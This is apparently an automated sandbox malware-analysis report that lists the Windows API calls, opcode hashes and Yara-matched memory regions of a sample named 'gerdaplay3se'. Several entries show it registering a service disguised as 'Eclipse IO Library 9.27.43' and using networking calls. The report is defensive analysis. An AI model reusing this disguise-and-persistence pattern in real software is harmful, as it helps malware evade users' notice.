                                                                                  • API ID: __getptd_noexit$ExitFilterThreadUserXcpt__amsg_exit__freeptd
                                                                                  • String ID:
                                                                                  • API String ID: 1405322794-0
                                                                                  • Opcode ID: bbd6c98bf13135d86e12253a9e123cfdd9919e7a9519f495c49ac25897fc4dbe
                                                                                  • Instruction ID: 630c5bfb94863845bf0b9f0a328ecf90b01efcdf14e4e5bcec3df8cc5d5feed1
                                                                                  • Opcode Fuzzy Hash: bbd6c98bf13135d86e12253a9e123cfdd9919e7a9519f495c49ac25897fc4dbe
                                                                                  • Instruction Fuzzy Hash: 61E0ECB1945605DFEB08BBA0D909F6E7776EF45302F200188E1029B360EB799D40AF31
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.3368613659.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000003.00000002.3368613659.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_gerdaplay3se.jbxd
                                                                                  Similarity
                                                                                  • API ID: ManagerOpen
                                                                                  • String ID:
                                                                                  • API String ID: 1889721586-0
                                                                                  • Opcode ID: 0f0cca2a6aecdbe056089abd869a91924bc3b5783ab3fdd70ed22ce2aaf3f922
                                                                                  • Instruction ID: 3cd76435cd1bf139601aa08b14a54904b28d8d0ad8e68c1ca0bfa51a29fee9e9
                                                                                  • Opcode Fuzzy Hash: 0f0cca2a6aecdbe056089abd869a91924bc3b5783ab3fdd70ed22ce2aaf3f922
                                                                                  • Instruction Fuzzy Hash: 3CC01231709001DAC7104F986BEC4686298A1843567300C37D207F11D0C1BA4D06652E
                                                                                  APIs
                                                                                  • CreateDirectoryA.KERNELBASE ref: 0040B107
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.3368613659.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000003.00000002.3368613659.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_gerdaplay3se.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateDirectory
                                                                                  • String ID:
                                                                                  • API String ID: 4241100979-0
                                                                                  • Opcode ID: df666fc502ade0904578102425999ea0927b9f00e6a2c316619051f88a11ad6d
                                                                                  • Instruction ID: 71643fb07f78fec73aeb73823573a7f75fd60fc4bda966918bfa20a3da973925
                                                                                  • Opcode Fuzzy Hash: df666fc502ade0904578102425999ea0927b9f00e6a2c316619051f88a11ad6d
                                                                                  • Instruction Fuzzy Hash: B4C04C301DE661BAD10252601D6D86A192858063453210073B202FA0D182FC0717A27F
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.3368613659.0000000000409000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000003.00000002.3368613659.0000000000400000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_gerdaplay3se.jbxd
                                                                                  Similarity
                                                                                  • API ID: LibraryLoad
                                                                                  • String ID:
                                                                                  • API String ID: 1029625771-0
                                                                                  • Opcode ID: 6e5f3b25cd2b540753a641dcc8df6c5fb52c16c6b4820e0ccc2656478566ffdf
                                                                                  • Instruction ID: a210966bc73cc5cab0eee629d8072e29fa6397a950e0fae30b08fce87dc579f3
                                                                                  • Opcode Fuzzy Hash: 6e5f3b25cd2b540753a641dcc8df6c5fb52c16c6b4820e0ccc2656478566ffdf
                                                                                  • Instruction Fuzzy Hash: D9C09231890151CBCB00CFA0D9981197BB1BB0A3027518A6BE862F2284DBB5A0818A8A
                                                                                  APIs
                                                                                  • CreateDirectoryA.KERNELBASE ref: 0040B107
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.3368613659.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000003.00000002.3368613659.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_gerdaplay3se.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateDirectory
                                                                                  • String ID:
                                                                                  • API String ID: 4241100979-0
                                                                                  • Opcode ID: 78ec478338408ad1c8d86fceb78597eb6c3200674d8e50b2c1fdaa219a013c93
                                                                                  • Instruction ID: 5ecf86d6fcc9e0072576bb314e39d51fa2a309ce43e938f39c6c16362cb17b00
                                                                                  • Opcode Fuzzy Hash: 78ec478338408ad1c8d86fceb78597eb6c3200674d8e50b2c1fdaa219a013c93
                                                                                  • Instruction Fuzzy Hash: ACB0123049E830F6C01157100D6CC5F182C58053893200032B303B40C002FC021292BF
                                                                                  APIs
                                                                                  • RegCloseKey.KERNELBASE(?), ref: 0040B201
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.3368613659.0000000000409000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000003.00000002.3368613659.0000000000400000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_gerdaplay3se.jbxd
                                                                                  Similarity
                                                                                  • API ID: Close
                                                                                  • String ID:
                                                                                  • API String ID: 3535843008-0
                                                                                  • Opcode ID: 0619af9ce46f6ba007f113b533e9913df0395168a4f8c105e8de7cd7f2abdc9e
                                                                                  • Instruction ID: 135f214858860a95caaf656eb2adbe6d945cd54912c2b765fb7e399feef37828
                                                                                  • Opcode Fuzzy Hash: 0619af9ce46f6ba007f113b533e9913df0395168a4f8c105e8de7cd7f2abdc9e
                                                                                  • Instruction Fuzzy Hash: E5A01230C95000B7C7021740DE0885CBE646E083003300171B202300F082B610105B19
                                                                                  APIs
                                                                                    • Part of subcall function 02D71550: OpenEventA.KERNEL32(00100002,00000000,00000000,84A2267A), ref: 02D715F0
                                                                                    • Part of subcall function 02D71550: CloseHandle.KERNEL32(00000000), ref: 02D71605
                                                                                    • Part of subcall function 02D71550: ResetEvent.KERNEL32(00000000,84A2267A), ref: 02D7160F
                                                                                    • Part of subcall function 02D71550: CloseHandle.KERNEL32(00000000,84A2267A), ref: 02D71644
                                                                                  • TlsSetValue.KERNEL32(0000002B,?), ref: 02D720EA
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CloseEventHandle$OpenResetValue
                                                                                  • String ID:
                                                                                  • API String ID: 1556185888-0
                                                                                  • Opcode ID: 1e65a3bc05ec8e50d14594c12640fc846e3e9a6dc7fe364c191e918a1ae4e08b
                                                                                  • Instruction ID: c8648986a0bf9343bb45b62eda0410b3756a20ea04600b84be6a52b74ee2944b
                                                                                  • Opcode Fuzzy Hash: 1e65a3bc05ec8e50d14594c12640fc846e3e9a6dc7fe364c191e918a1ae4e08b
                                                                                  • Instruction Fuzzy Hash: 61014F71A44204ABD710DF59DC45B5ABBB8FB05771F20476AF829D3380E775AD148BA0
                                                                                  APIs
                                                                                    • Part of subcall function 00401F64: FindResourceA.KERNEL32(?,0000000A), ref: 00401F7A
                                                                                    • Part of subcall function 00401F64: GetLastError.KERNEL32 ref: 00401F86
                                                                                    • Part of subcall function 00401F64: SizeofResource.KERNEL32(00000000), ref: 00401F93
                                                                                  • Sleep.KERNELBASE(000007D0,?,0029226D), ref: 0040B801
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.3368613659.0000000000409000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000003.00000002.3368613659.0000000000400000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_gerdaplay3se.jbxd
                                                                                  Similarity
                                                                                  • API ID: Resource$ErrorFindLastSizeofSleep
                                                                                  • String ID:
                                                                                  • API String ID: 2659282285-0
                                                                                  • Opcode ID: a30d2dc63f565f5f77289b332b500a051927e9fec619ad8cc045ff4e98d544ad
                                                                                  • Instruction ID: 039b88a8dcf10f9c244d64d6b241b3a1228976f9836f64239fed7cb20f37302f
                                                                                  • Opcode Fuzzy Hash: a30d2dc63f565f5f77289b332b500a051927e9fec619ad8cc045ff4e98d544ad
                                                                                  • Instruction Fuzzy Hash: 39D05E3265C202CAD20C221034197341161F748B51F34003FF10B7A1D18EBE0402628F
                                                                                  APIs
                                                                                  • Sleep.KERNELBASE(000007D0,?,0029226D), ref: 0040B801
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.3368613659.0000000000409000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000003.00000002.3368613659.0000000000400000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_gerdaplay3se.jbxd
                                                                                  Similarity
                                                                                  • API ID: Sleep
                                                                                  • String ID:
                                                                                  • API String ID: 3472027048-0
                                                                                  • Opcode ID: 71ed06270a55f957fb0ae97acaf2e41d6db21340e7040e3977e60c44980708ad
                                                                                  • Instruction ID: 529134bb4be7d436e77b599dc39e4bb55d0dc1ab89edbbba415f2bcaffe7b413
                                                                                  • Opcode Fuzzy Hash: 71ed06270a55f957fb0ae97acaf2e41d6db21340e7040e3977e60c44980708ad
                                                                                  • Instruction Fuzzy Hash: B5D05EB6948206EAEA002B106A457683124FB08315F642433FA07B61D6DB795442D6DE
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.3368613659.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000003.00000002.3368613659.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_gerdaplay3se.jbxd
                                                                                  Similarity
                                                                                  • API ID: lstrcmpi
                                                                                  • String ID:
                                                                                  • API String ID: 1586166983-0
                                                                                  • Opcode ID: afc060a1dc9f2c09d52ddf769f7b78e1d9a5007ca048432da7c9afa9c24ed8d5
                                                                                  • Instruction ID: 0e5a9f3835fceab65f8161c2ac0e78c46e2dcfbafadd64f81733265e883a368e
                                                                                  • Opcode Fuzzy Hash: afc060a1dc9f2c09d52ddf769f7b78e1d9a5007ca048432da7c9afa9c24ed8d5
                                                                                  • Instruction Fuzzy Hash: 64D01270D06519EED7106F714A6C2AF7664E914755730487FD813F11C0D7BC41116A6D
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.3368613659.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000003.00000002.3368613659.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_gerdaplay3se.jbxd
                                                                                  Similarity
                                                                                  • API ID: Sleep
                                                                                  • String ID:
                                                                                  • API String ID: 3472027048-0
                                                                                  • Opcode ID: 9c80ea6232b6eb2ca8ec1a064af6b754d7b368a06d3accd401c5647994c6c113
                                                                                  • Instruction ID: 4dd6e061a2ed90917861212372999b9d1b5613fcf30d17e99f345e0966a7defc
                                                                                  • Opcode Fuzzy Hash: 9c80ea6232b6eb2ca8ec1a064af6b754d7b368a06d3accd401c5647994c6c113
                                                                                  • Instruction Fuzzy Hash: 5EC04C75989601A7C2013AA16E45BB4B624E70D319F2450366607304E197796126A6DF
                                                                                  APIs
                                                                                  • Sleep.KERNELBASE(000007D0,?,0029226D), ref: 0040B801
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.3368613659.0000000000409000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000003.00000002.3368613659.0000000000400000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_gerdaplay3se.jbxd
                                                                                  Similarity
                                                                                  • API ID: Sleep
                                                                                  • String ID:
                                                                                  • API String ID: 3472027048-0
                                                                                  • Opcode ID: 94d9deb5d794199e98e93e1f5b18ef859441c1898a632bacdd8ea4d66eb887a1
                                                                                  • Instruction ID: 5785da175a53eedf82b78341746dfd2aafd78d5412f9d825c06b865f4fdbab56
                                                                                  • Opcode Fuzzy Hash: 94d9deb5d794199e98e93e1f5b18ef859441c1898a632bacdd8ea4d66eb887a1
                                                                                  • Instruction Fuzzy Hash: 07C09271998602EAD24427507A49B343230FB44B42FB4113BB603764E28BBE0403BADF
                                                                                  APIs
                                                                                  • CreateServiceA.ADVAPI32 ref: 0040270C
                                                                                  • CloseServiceHandle.ADVAPI32(?), ref: 0040B411
                                                                                  • CloseServiceHandle.ADVAPI32(00000000), ref: 0040B86E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.3368613659.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000003.00000002.3368613659.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_gerdaplay3se.jbxd
                                                                                  Similarity
                                                                                  • API ID: Service$CloseHandle$Create
                                                                                  • String ID:
                                                                                  • API String ID: 2095555506-0
                                                                                  • Opcode ID: 8282fb0c9cfcdb19bba24561d8ecf29e5b81246dde775ad19adb4ef11915ab64
                                                                                  • Instruction ID: e72162baefc81ba72820ea022bb1d37a2cc7e083464921caf7f039fb4e03aedc
                                                                                  • Opcode Fuzzy Hash: 8282fb0c9cfcdb19bba24561d8ecf29e5b81246dde775ad19adb4ef11915ab64
                                                                                  • Instruction Fuzzy Hash: E3D0C731844015EBCF159FA15F4841D7A35E7403417224472E103761E1C73A5F26BEAE
                                                                                  APIs
                                                                                  • FormatMessageA.KERNEL32(00001200,00000000,?,00000400,?,00000010,00000000), ref: 02D708E2
                                                                                  • GetLastError.KERNEL32(?,00000400,?,00000010,00000000), ref: 02D708EA
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorFormatLastMessage
                                                                                  • String ID:
                                                                                  • API String ID: 3479602957-0
                                                                                  • Opcode ID: dd03867116efb9cd43d4c093e92a77269bfb8257ad90c17feacd3712422c3611
                                                                                  • Instruction ID: 2ffc560491db4ae4d9596ce75569c534aae23fe962c7b781686f826c6ac2b36a
                                                                                  • Opcode Fuzzy Hash: dd03867116efb9cd43d4c093e92a77269bfb8257ad90c17feacd3712422c3611
                                                                                  • Instruction Fuzzy Hash: 70F09A30208301CFEB24CE25C851B2EBBE4AB9C745F54092DF596A22D1E374E981CB6A
                                                                                  APIs
                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,02D74DD6,?,?,?,00000001), ref: 02D7946D
                                                                                  • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 02D79476
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ExceptionFilterUnhandled
                                                                                  • String ID:
                                                                                  • API String ID: 3192549508-0
                                                                                  • Opcode ID: e06ed100e4bd6c8998d880194c8b835730ce5c7439a983cdd29830e0eb8297ac
                                                                                  • Instruction ID: 83bf20bdbba7bb536eb4eb3a1488717098c1b53b8ff157353c5da5a46865c067
                                                                                  • Opcode Fuzzy Hash: e06ed100e4bd6c8998d880194c8b835730ce5c7439a983cdd29830e0eb8297ac
                                                                                  • Instruction Fuzzy Hash: 70B09239494208EBEB012B91EC09B89BF38FB04762F304810F61D44250CB6258209AA2
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _memset
                                                                                  • String ID:
                                                                                  • API String ID: 2102423945-0
                                                                                  • Opcode ID: 50ed358c2bc5baa28b61a63f85c8bcfb39f11c9cdbb9bf2bbec23c38127e8fb6
                                                                                  • Instruction ID: 75a5b46eb412bad3110e6fd7fa02d7b4e1e19f2ecc75d69f99dc5522c812ff6f
                                                                                  • Opcode Fuzzy Hash: 50ed358c2bc5baa28b61a63f85c8bcfb39f11c9cdbb9bf2bbec23c38127e8fb6
                                                                                  • Instruction Fuzzy Hash: A2F082B1904309ABD700DF95D946B9DFBB9EF44314F208179D508A7340F6707E118B94
                                                                                  APIs
                                                                                  • StartServiceCtrlDispatcherA.ADVAPI32(?), ref: 0040B728
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.3368613659.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000003.00000002.3368613659.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_gerdaplay3se.jbxd
                                                                                  Similarity
                                                                                  • API ID: CtrlDispatcherServiceStart
                                                                                  • String ID:
                                                                                  • API String ID: 3789849863-0
                                                                                  • Opcode ID: deec43b8dcc897605fa050e878db13adb1085b9c2442af474a0c99484f8a22c2
                                                                                  • Instruction ID: 2c378dae27369dad1c58bd9ba8a5e02095a08d98542137ac852fb368b363cb6f
                                                                                  • Opcode Fuzzy Hash: deec43b8dcc897605fa050e878db13adb1085b9c2442af474a0c99484f8a22c2
                                                                                  • Instruction Fuzzy Hash: 32D0A7B504C2C2DFC306876404088793F38784A25130606D3C0835A297D339415A83B7
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 02D64608
                                                                                    • Part of subcall function 02D73A8F: _malloc.LIBCMT ref: 02D73AA7
                                                                                  • htons.WS2_32(?), ref: 02D64669
                                                                                  • htonl.WS2_32(?), ref: 02D6468C
                                                                                  • htonl.WS2_32(00000000), ref: 02D64693
                                                                                  • htons.WS2_32(00000000), ref: 02D64747
                                                                                  • _sprintf.LIBCMT ref: 02D6475D
                                                                                    • Part of subcall function 02D688C3: _memmove.LIBCMT ref: 02D688E3
                                                                                  • htons.WS2_32(?), ref: 02D646B0
                                                                                    • Part of subcall function 02D6966E: __EH_prolog.LIBCMT ref: 02D69673
                                                                                    • Part of subcall function 02D6966E: RtlEnterCriticalSection.NTDLL(00000020), ref: 02D696EE
                                                                                    • Part of subcall function 02D6966E: RtlLeaveCriticalSection.NTDLL(00000020), ref: 02D6970C
                                                                                    • Part of subcall function 02D61BA7: __EH_prolog.LIBCMT ref: 02D61BAC
                                                                                    • Part of subcall function 02D61BA7: RtlEnterCriticalSection.NTDLL ref: 02D61BBC
                                                                                    • Part of subcall function 02D61BA7: RtlLeaveCriticalSection.NTDLL ref: 02D61BEA
                                                                                    • Part of subcall function 02D61BA7: RtlEnterCriticalSection.NTDLL ref: 02D61C13
                                                                                    • Part of subcall function 02D61BA7: RtlLeaveCriticalSection.NTDLL ref: 02D61C56
                                                                                    • Part of subcall function 02D6DE2A: __EH_prolog.LIBCMT ref: 02D6DE2F
                                                                                  • htonl.WS2_32(?), ref: 02D6497C
                                                                                  • htonl.WS2_32(00000000), ref: 02D64983
                                                                                  • htonl.WS2_32(00000000), ref: 02D649C8
                                                                                  • htonl.WS2_32(00000000), ref: 02D649CF
                                                                                  • htons.WS2_32(?), ref: 02D649EF
                                                                                  • htons.WS2_32(?), ref: 02D649F9
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CriticalSectionhtonl$htons$H_prolog$EnterLeave$_malloc_memmove_sprintf
                                                                                  • String ID: Pz
                                                                                  • API String ID: 1645262487-1603573826
                                                                                  • Opcode ID: 6d9dc6ec16cf3578b8361bf86dcb0e5b26bd0234ce24eadd1c90edb45142575e
                                                                                  • Instruction ID: e415e5cba9bd327617f7b38bef11e82803d3ad54d5bae97460ec10c03d42ba1b
                                                                                  • Opcode Fuzzy Hash: 6d9dc6ec16cf3578b8361bf86dcb0e5b26bd0234ce24eadd1c90edb45142575e
                                                                                  • Instruction Fuzzy Hash: 08022771C10259ABEF25DBA4D848BFEBBB9EF08304F10415AE545B7280DB745E88CFA1
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 02D624E6
                                                                                  • InterlockedCompareExchange.KERNEL32(?,00000000,00000001), ref: 02D624FC
                                                                                  • RtlEnterCriticalSection.NTDLL(?), ref: 02D6250E
                                                                                  • RtlLeaveCriticalSection.NTDLL(?), ref: 02D6256D
                                                                                  • SetLastError.KERNEL32(00000000,?,7622DFB0), ref: 02D6257F
                                                                                  • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000001F4,?,7622DFB0), ref: 02D62599
                                                                                  • GetLastError.KERNEL32(?,7622DFB0), ref: 02D625A2
                                                                                  • InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 02D625F0
                                                                                  • InterlockedDecrement.KERNEL32(00000002), ref: 02D6262F
                                                                                  • InterlockedExchange.KERNEL32(00000000,00000000), ref: 02D6268E
                                                                                  • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02D62699
                                                                                  • InterlockedExchange.KERNEL32(00000000,00000001), ref: 02D626AD
                                                                                  • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000000,?,7622DFB0), ref: 02D626BD
                                                                                  • GetLastError.KERNEL32(?,7622DFB0), ref: 02D626C7
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Interlocked$Exchange$ErrorLast$CompareCompletionCriticalQueuedSectionStatus$DecrementEnterH_prologLeavePost
                                                                                  • String ID:
                                                                                  • API String ID: 1213838671-0
                                                                                  • Opcode ID: 27974e582a7a706b1001bf407879418c44e48d4edbce649d2b3cef19411e768d
                                                                                  • Instruction ID: cbc9b5fd1d984f5d8e779f4479aebb24397922e2625288f91700fdf997b1b10e
                                                                                  • Opcode Fuzzy Hash: 27974e582a7a706b1001bf407879418c44e48d4edbce649d2b3cef19411e768d
                                                                                  • Instruction Fuzzy Hash: F8612E75910209AFDB10DFA4D988AAEFBB9FF08314F204929E956E7340E734AD54CF61
                                                                                  APIs
                                                                                  • RegisterServiceCtrlHandlerA.ADVAPI32(Eclipse IO Library 9.27.43,Function_0000235E), ref: 004023C1
                                                                                  • SetServiceStatus.ADVAPI32(0040A0E0), ref: 00402420
                                                                                  • GetLastError.KERNEL32 ref: 00402422
                                                                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 0040242F
                                                                                  • GetLastError.KERNEL32 ref: 00402450
                                                                                  • SetServiceStatus.ADVAPI32(0040A0E0), ref: 00402480
                                                                                  • CreateThread.KERNEL32(00000000,00000000,Function_000022CB,00000000,00000000,00000000), ref: 0040248C
                                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00402495
                                                                                  • CloseHandle.KERNEL32 ref: 004024A1
                                                                                  • SetServiceStatus.ADVAPI32(0040A0E0), ref: 004024CA
                                                                                  Strings
                                                                                  • Eclipse IO Library 9.27.43, xrefs: 004023BC
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.3368613659.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000003.00000002.3368613659.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_gerdaplay3se.jbxd
                                                                                  Similarity
                                                                                  • API ID: Service$Status$CreateErrorLast$CloseCtrlEventHandleHandlerObjectRegisterSingleThreadWait
                                                                                  • String ID: Eclipse IO Library 9.27.43
                                                                                  • API String ID: 3346042915-2124222407
                                                                                  • Opcode ID: 753c8bccf627cb5353d4a294398c8736193124083ae435b11ee25f47cab8285e
                                                                                  • Instruction ID: 1420ef795783f2c616889eaeaacfbb85f42c25b2a6fdf7f0143c9c805b11b94c
                                                                                  • Opcode Fuzzy Hash: 753c8bccf627cb5353d4a294398c8736193124083ae435b11ee25f47cab8285e
                                                                                  • Instruction Fuzzy Hash: D4210C70441309EBD210DF16EF49E567FB8EB85754711C03BE206B22B0D7BA0064EB6E
                                                                                  APIs
                                                                                  • RtlDecodePointer.NTDLL(?), ref: 02D7827A
                                                                                  • _free.LIBCMT ref: 02D78293
                                                                                    • Part of subcall function 02D72EB4: HeapFree.KERNEL32(00000000,00000000,?,02D75C12,00000000,00000104,76230A60), ref: 02D72EC8
                                                                                    • Part of subcall function 02D72EB4: GetLastError.KERNEL32(00000000,?,02D75C12,00000000,00000104,76230A60), ref: 02D72EDA
                                                                                  • _free.LIBCMT ref: 02D782A6
                                                                                  • _free.LIBCMT ref: 02D782C4
                                                                                  • _free.LIBCMT ref: 02D782D6
                                                                                  • _free.LIBCMT ref: 02D782E7
                                                                                  • _free.LIBCMT ref: 02D782F2
                                                                                  • _free.LIBCMT ref: 02D78316
                                                                                  • RtlEncodePointer.NTDLL(007ABA90), ref: 02D7831D
                                                                                  • _free.LIBCMT ref: 02D78332
                                                                                  • _free.LIBCMT ref: 02D78348
                                                                                  • _free.LIBCMT ref: 02D78370
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _free$Pointer$DecodeEncodeErrorFreeHeapLast
                                                                                  • String ID:
                                                                                  • API String ID: 3064303923-0
                                                                                  • Opcode ID: 26a3cd59c086431cfbf1aed9d0b84296398cce0bdfc5eb8ecae04c46b551977a
                                                                                  • Instruction ID: f01bee30aa8beb04462e52ac5be8fac5e356c04342f7c2ddfd77daa5bc8266f8
                                                                                  • Opcode Fuzzy Hash: 26a3cd59c086431cfbf1aed9d0b84296398cce0bdfc5eb8ecae04c46b551977a
                                                                                  • Instruction Fuzzy Hash: C4218D36D816509BDB256F29F8889167769EB06761729482AFC08D7300E73CDC61EFE0
                                                                                  APIs
                                                                                  • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00402DE4), ref: 004035B9
                                                                                  • GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00402DE4), ref: 004035CD
                                                                                  • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00402DE4), ref: 004035F9
                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00402DE4), ref: 00403631
                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00402DE4), ref: 00403653
                                                                                  • FreeEnvironmentStringsW.KERNEL32(00000000,?,00000000,?,?,?,?,00402DE4), ref: 0040366C
                                                                                  • GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00402DE4), ref: 0040367F
                                                                                  • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 004036BD
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.3368613659.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000003.00000002.3368613659.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_gerdaplay3se.jbxd
                                                                                  Similarity
                                                                                  • API ID: EnvironmentStrings$ByteCharFreeMultiWide
                                                                                  • String ID: -@
                                                                                  • API String ID: 1823725401-2999422947
                                                                                  • Opcode ID: d09c44be7b725e9416f1bbabc7ff939c5033ef1a694eb4ed66286c613d9d8241
